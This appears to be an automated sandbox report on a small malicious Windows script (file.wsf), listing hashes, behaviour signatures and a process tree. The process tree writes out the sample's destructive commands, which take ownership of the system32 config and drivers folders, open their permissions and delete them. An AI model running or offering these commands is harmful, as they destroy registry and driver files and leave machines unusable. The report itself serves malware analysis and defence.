Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    15-08-2024 21:32

General

  • Target

    file.wsf

  • Size

    2KB

  • MD5

    a5248e8a553244ebf5fe783d59068860

  • SHA1

    f866fc5f1d41e8cf209b3ea253f49a9caebb0012

  • SHA256

    e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c

  • SHA512

    7f7fafcee64a9d9d5ca06e19e011f6e485e931b06a256bf924fa06e7ade8ac25458dc8980c6409c16a22f93602ea5e6e872754966bf67a92a7b3ab4b749465b8

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2764
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\config\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2796
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\config\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1912
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2680
        • C:\Windows\system32\takeown.exe
          takeown /f c:\windows\system32\drivers\*
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:1264
        • C:\Windows\system32\icacls.exe
          icacls c:\windows\system32\drivers\* /grant everyone:(f)
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2160
  • C:\Windows\System32\Notepad.exe
    "C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\UnpublishReceive.vbs
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:2816
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\SetPush.vbs"
    1⤵
      PID:2976
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\UnpublishReceive.vbs"
      1⤵
        PID:2804
      • C:\Windows\system32\wbem\WMIADAP.EXE
        wmiadap.exe /F /T
        1⤵
          PID:2604

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\thescript.vbs

          Filesize

          2KB

          MD5

          a5248e8a553244ebf5fe783d59068860

          SHA1

          f866fc5f1d41e8cf209b3ea253f49a9caebb0012

          SHA256

          e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c

          SHA512

          7f7fafcee64a9d9d5ca06e19e011f6e485e931b06a256bf924fa06e7ade8ac25458dc8980c6409c16a22f93602ea5e6e872754966bf67a92a7b3ab4b749465b8

        • C:\Users\Admin\Desktop\GetMove.vbs

          Filesize

          78B

          MD5

          ece02545122cc48c9d8afaf3f94dd04f

          SHA1

          8e07b6da685faad07f8413230a95ce0ae8987e0d

          SHA256

          5098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206

          SHA512

          e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5